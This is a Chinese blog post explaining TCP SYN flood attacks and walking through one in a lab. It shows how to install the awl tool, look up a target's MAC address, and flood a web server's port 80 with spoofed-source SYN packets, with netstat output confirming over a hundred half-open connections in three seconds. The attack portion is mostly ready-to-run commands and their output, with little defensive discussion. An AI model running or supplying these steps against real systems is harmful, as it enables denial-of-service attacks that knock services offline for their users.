zoukankan      html  css  js  c++  java
  • 利用tcp三次握手,使用awl伪装MAC地址进行多线程SYN洪水攻击

    SYN洪水攻击概述:
    SYN洪水攻击主要源于: tcp协议的三次握手机制
    tcp协议面向链接的协议
    SYN洪水攻击的过程:
    在服务端返回一个确认的SYN-ACK包的时候有个潜在的弊端,如果发起的客户是一个不存在的客户端,那么服务端就不会接到客户端回应的ACK包
    这时服务端需要耗费一定的数量的系统内存来等待这个未决的连接,直到等待超关闭时间,才能施放内存
    如果恶意者通过通过ip欺骗,发送大量SYN包给受害者系统,导致服务端存在大量未决的连接并占用大量内存和tcp连接,从而导致正常客户端无法访问服务端,这就是SYN洪水攻击的过程

    在客户机上安装awl软件进行攻击
    下载地址:
    https://gitlab.com/davical-project/awl/tags
    上传到linux系统中
    开始安装awl

    [root@DaMoWang ~]# tar xf awl-0.2.tar.gz -C /usr/src/
    [root@DaMoWang ~]# cd /usr/src/awl-0.2/
    [root@DaMoWang awl-0.2]# ./configure && make -j 4 && make install
    [root@DaMoWang awl-0.2]# which awl
    /usr/local/bin/awl

    awl伪装MAC地址进行多线程SYN攻击 > 获取对方的IP地址解析成MAC地址

    [root@DaMoWang ~]# arp -n
    Address                  HWtype  HWaddress           Flags Mask            Iface
    192.168.94.1             ether   00:50:56:c0:00:08   C                     ens33
    192.168.94.2             ether   00:50:56:f9:bc:19   C                     ens33
    [root@DaMoWang ~]# ping 192.168.94.29
    [root@DaMoWang ~]# arp -n
    Address                  HWtype  HWaddress           Flags Mask            Iface
    192.168.94.29            ether   00:0c:29:7d:b5:99   C                     ens33
    192.168.94.1             ether   00:50:56:c0:00:08   C                     ens33
    192.168.94.2             ether   00:50:56:f9:bc:19   C                     ens33

    awl参数如下:
    -i 发送包的接口
    -m 指定目标mac地址 注:如果-m没有指定mac,默认目标MAC地址是“FF.FF.FF.FF.FF.FF”,
    这表示向同一网段内的所有主机发出ARP广播,进行SYN攻击,还容易使整个局域网瘫痪
    -d 被攻击机器的IP
    -p 被攻击机器的端口

    # 查看被攻击前的wab服务器80端口
    [root@server ~]# netstat -antup|grep :80
    tcp6       0      0 :::80                   :::*                    LISTEN      1750/httpd          

    开始攻击:

    # 测试攻击三秒
    [root@DaMoWang ~]# awl -i ens33 -m 00:0c:29:7d:b5:99 -d 192.168.94.29 -p 80

     #攻击效果:
     #在server上查看:发现很多伪装成公网的IP在攻击我们

    [root@server ~]# netstat -antup|grep :80
    tcp        0      0 192.168.94.29:80        252.60.102.53:3310      SYN_RECV    -                   
    tcp        0      0 192.168.94.29:80        250.167.218.42:54569    SYN_RECV    -                   
    tcp        0      0 192.168.94.29:80        245.241.14.61:48316     SYN_RECV    -                   
    tcp        0      0 192.168.94.29:80        246.144.13.20:33828     SYN_RECV    -                   
    tcp        0      0 192.168.94.29:80        250.221.131.26:56896    SYN_RECV    -                   
    tcp        0      0 192.168.94.29:80        245.222.184.94:46875    SYN_RECV    -                   
    tcp        0      0 192.168.94.29:80        241.98.121.43:13190     SYN_RECV    -                   
    tcp        0      0 192.168.94.29:80        250.5.25.10:43506       SYN_RECV    -                   
    tcp        0      0 192.168.94.29:80        247.23.128.105:46118    SYN_RECV    -                   
    tcp        0      0 192.168.94.29:80        251.126.27.89:11781     SYN_RECV    -                   
    tcp        0      0 192.168.94.29:80        241.51.26.67:3393       SYN_RECV    -                   
    tcp        0      0 192.168.94.29:80        255.103.18.1:13774      SYN_RECV    -                   
    tcp        0      0 192.168.94.29:80        254.239.94.37:5561      SYN_RECV    -                   
    tcp        0      0 192.168.94.29:80        243.180.7.100:24802     SYN_RECV    -                   
    tcp        0      0 192.168.94.29:80        253.170.6.21:26871      SYN_RECV    -                   
    tcp        0      0 192.168.94.29:80        247.92.108.56:25729     SYN_RECV    -                   
    tcp        0      0 192.168.94.29:80        248.187.73.6:24181      SYN_RECV    -

      [root@server ~]# netstat -antup|grep :80 |wc -l
      121

     #三秒钟 一百多次攻击 

    --求知若饥 虚心若愚
  • 相关阅读:
    [leetcode] LRU Cache @ Python
    [leetcode]Swap Nodes in Pairs @ Python
    [leetcode]Add Two Numbers @ Python
    [leetcode]Candy @ Python
    [leetcode]Gas Station @ Python
    [leetcode]Plus One @ Python
    接口测试-压力-Jmeter继续使用
    移动互联网应用测试,推荐两本书
    Android dumpsys 内存分析
    内存泄露分析之MAT工具简单使用
  • 原文地址:https://www.cnblogs.com/bigdevilking/p/9349498.html
Copyright © 2011-2022 走看看